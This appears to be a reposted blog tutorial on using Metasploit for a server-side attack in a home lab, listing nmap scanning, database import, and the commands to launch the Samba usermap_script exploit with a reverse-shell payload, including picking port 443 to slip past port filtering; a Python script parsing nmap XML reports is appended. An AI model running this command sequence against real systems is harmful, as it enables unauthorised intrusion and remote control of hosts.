Using Metasploit (server-side attacks are one of the most popular features of the tool)

1. Start Metasploit

Disclaimer: the host tested in this penetration test is another operating system that I set up on my own attacking host. For realism I used common IP addresses; if they overlap with anything, they are absolutely not the IP addresses of any real company or organization. Therefore I assume no legal responsibility. Please credit the source when reprinting.

(Reprinted from https://www.cnblogs.com/xinxianquan/p/9586041.html)

Start it with the msfconsole command. You may need to run it twice; otherwise the PostgreSQL database may fail to load and the Metasploit service will not start. Alternatively, msfgui starts Metasploit with a graphical interface, but it has to be installed in advance; another command is msfcli (command-line based). Starting msfconsole directly in the traditional way is recommended; in that case the database and service are not started under its own configuration.

2. Scan an address range with nmap and import the generated report into Metasploit for further processing. An nmap scan can take a very long time.

3. Import the generated scan data into Metasploit with the command db_import my.xml.

Alternatively, import a single host directly by scanning it from within Metasploit with db_nmap -n -A.

Query the services (services command).

Query the vulnerabilities.

Use an exploit. The exploit needs a payload, so query the available payloads and supply the parameters the payload requires.

Show more payloads (show payloads). Because one exploit can run several payloads, a different payload can be substituted.

Set the payload to load.

After setting the payload, check the options again to confirm that the payload was set successfully; this determines whether the attack will work at all.

Enter exploit to run the exploit.

To sum up the commands used in the test above:

Step 1: scan a range of IP addresses for hosts with nmap: nmap -n -oX my.xml 172.168.189.0/24

Step 2: import the nmap scan results: db_import my.xml

Step 3: check the services running on the remote hosts: services

Addendum (a single host can be scanned with nmap and imported at the same time): db_nmap -n -A 172.16.189.131

Step 4: search for exploitable vulnerabilities matching the gathered information: search samba (service name) type:exploit platform:unix

Step 5: select the exploit: use exploit/multi/samba/usermap_script

Step 6: query the configuration parameters and the payload to load: show options

Step 7: query the payloads the exploit can use: show payloads

Step 8: set the payload: set payload cmd/unix/reverse (payload information)

Supplement: some payloads need information about the attacking host, which must be added. In addition, I want to explain the port set on the attacked remote host: in general, set a port that avoids restrictions on the remote side. Port 443 is generally not restricted, since it is usually reserved for SSL traffic, so setting this port can bypass some port restrictions.

Step 9: check again whether the payload has been set: show options

Step 10: set RHOST, LHOST and the port number: set RHOST 192.168.1.1, set LPORT 443

Step 11: run the exploit: exploit
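Steps 1 to 3 hinge on the XML report that nmap -oX writes, which db_import loads into Metasploit's hosts and services tables. The following added example (not part of the original post) parses that standard nmap XML format in plain Python and summarises, per live host, the open ports and the service banner nmap attached to them, then flags which hosts expose a given service (here Samba, the service the post searches for). The XML document is constructed sample data; the host addresses in it are documentation addresses, not hosts from the post.

```python
"""Parse an nmap -oX report and summarise open services per host.

Added example, not from the original post. Reads the standard nmap XML
format (what `nmap -n -oX my.xml <range>` produces and `db_import` loads).
SAMPLE_NMAP_XML below is constructed sample data, not a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample report: two hosts up, one down, one closed port.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -oX my.xml 192.0.2.0/28">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return {ip: [(port, proto, service_name, product), ...]}.

    Only hosts reported "up" and only ports in state "open" are kept,
    mirroring what the `services` query shows after db_import.
    """
    root = ET.fromstring(xml_text)
    services = {}
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no service information
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        entries = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposed services
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            entries.append((int(port.get("portid")), port.get("protocol"), name, product))
        services[addr.get("addr")] = sorted(entries)
    return services


def hosts_with_service(services, keyword):
    """IPs exposing a service whose name or product contains keyword (case-insensitive)."""
    keyword = keyword.lower()
    return sorted(
        ip for ip, entries in services.items()
        if any(keyword in name.lower() or keyword in product.lower()
               for _, _, name, product in entries)
    )


def format_services(services):
    """Render the summary as one line per open port, similar to the services table."""
    lines = []
    for ip in sorted(services):
        for port, proto, name, product in services[ip]:
            lines.append(f"{ip:<15} {port:>5}/{proto:<3} {name:<12} {product}")
    return "\n".join(lines)


if __name__ == "__main__":
    found = parse_services(SAMPLE_NMAP_XML)
    print(format_services(found))
    # Which hosts expose Samba, i.e. would match the post's `search samba` step.
    print("Hosts exposing Samba:", hosts_with_service(found, "samba"))
```

Point the parser at a real my.xml (read the file instead of SAMPLE_NMAP_XML) to get the same per-host service list outside Metasploit, which is useful when reviewing what a scan actually found before deciding whether any exposed service needs patching or firewalling.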


Source: blog.csdn.net/weixin_43460822/article/details/96968271